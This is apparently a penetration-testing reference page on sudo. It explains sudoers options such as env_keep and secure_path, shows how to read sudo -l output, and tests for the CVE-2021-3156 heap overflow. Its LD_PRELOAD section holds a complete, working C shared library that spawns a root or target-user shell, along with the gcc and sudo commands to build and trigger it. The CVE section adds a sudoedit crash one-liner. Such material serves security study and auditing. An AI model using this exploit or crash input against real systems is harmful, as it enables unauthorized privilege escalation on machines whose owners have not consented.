Configuration options
env_reset: Runs the command in a minimal environment (TERM, PATH, HOME, MAIL, SHELL, LOGNAME, USER, USERNAME and SUDO_*) plus whatever env_keep and env_check allow from the invoking user; enabled by default.
env_keep: Lists additional environment variables that sudo preserves from the invoking user's environment even with env_reset on. If LD_PRELOAD is in there, see below.
mail_badpass: Sends mail to the configured mailto address when a user enters an incorrect sudo password.
secure_path: Replaces the invoking user's PATH with the given list of directories for every command run through sudo, so a user cannot redirect a command to a trojaned binary via their own PATH.
Configurations
Output like the following from sudo -l means that the user www-data may run any command as user scriptmanager (and group scriptmanager) without a password, for example sudo -u scriptmanager whoami:
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
LD_PRELOAD exploitation
If sudo keeps LD_PRELOAD (for example env_keep += LD_PRELOAD in sudoers; sudo -l shows the effective env_keep list under "Matching Defaults entries"), a shared library can be created and loaded into the target command before its main() runs, with the privileges of the target user. ld.so ignores LD_PRELOAD while loading the setuid sudo binary itself, but the command sudo execs runs with real and effective uid of the target user, so the library is honored there.
- Create a library file like escape_ld_preload.c
- Compile it as a shared library (-nostartfiles is needed because the file defines its own _init):
gcc -fPIC -shared -nostartfiles -o escape_ld_preload.so escape_ld_preload.c
- Pass it on the command line of a sudo-enabled command (a leading VAR=value argument is treated by sudo as an environment assignment):
sudo LD_PRELOAD=/tmp/escape_ld_preload.so passwd
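The following is an added example of such a library; it is my illustration, not the escape_ld_preload.c of the original page or any project, and the names preload_matches, spawn_shell and escape_init are my own. Unlike the classic _init variant, it uses __attribute__((constructor)) and is therefore built without -nostartfiles. The constructor fires only when LD_PRELOAD actually names this library, unsets LD_PRELOAD so the spawned shell and its children are not preloaded again, and falls back to a shell as the target user when setuid(0) fails because sudo ran the command as someone other than root (for instance scriptmanager from the rule above).

```c
// escape_ld_preload.c (added example, not the original page's file)
//
// Build:  gcc -fPIC -shared -o escape_ld_preload.so escape_ld_preload.c
// Use:    sudo LD_PRELOAD=/tmp/escape_ld_preload.so passwd
//
// sudo switches to the target user, execs the command, and ld.so loads this
// object first; the constructor therefore runs with the target user's ids
// before the command's main() is ever reached.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define LIB_NAME "escape_ld_preload"

/* Return 1 if the LD_PRELOAD value names this library, else 0.
 * Tying the trigger to the library name keeps the payload from firing
 * when the object is linked into something else (e.g. a test harness). */
int preload_matches(const char *ld_preload)
{
    if (ld_preload == NULL)
        return 0;
    return strstr(ld_preload, LIB_NAME) != NULL;
}

/* Replace the current process with a shell. Never returns. */
static void spawn_shell(void)
{
    /* Drop the variable so the shell and everything it runs are not
     * preloaded again (otherwise every child would exec yet another shell). */
    unsetenv("LD_PRELOAD");

    /* sudo already set real and effective ids to the target user. These
     * calls succeed only when that user is root; if the rule ran us as a
     * different user we simply keep that user's ids and still get a shell. */
    if (setgid(0) != 0 || setuid(0) != 0)
        fprintf(stderr, "[%s] target user is uid %d, not root; shell as that user\n",
                LIB_NAME, (int)getuid());

    execl("/bin/sh", "sh", (char *)NULL);

    /* Only reached if exec failed. */
    perror("execl");
    _exit(1);
}

/* Runs when the shared object is loaded, before the host program's main(). */
__attribute__((constructor))
static void escape_init(void)
{
    if (preload_matches(getenv("LD_PRELOAD")))
        spawn_shell();
}
```

If the sudo rule allows a specific non-root target user, the same library yields a shell as that user, which is often enough for a second hop; the check against LIB_NAME also means a stray LD_PRELOAD pointing at some other library does nothing.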
CVE-2021-3156 (Baron Samedit)
This check is for the heap overflow in sudo's command-line unescaping (sudo 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1), not for CVE-2019-18634, which is the separate pwfeedback buffer overflow. The system is vulnerable if the following crashes with a memory-corruption error; a patched sudo just prints its usage message instead:
$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): memory corruption
Aborted (core dumped)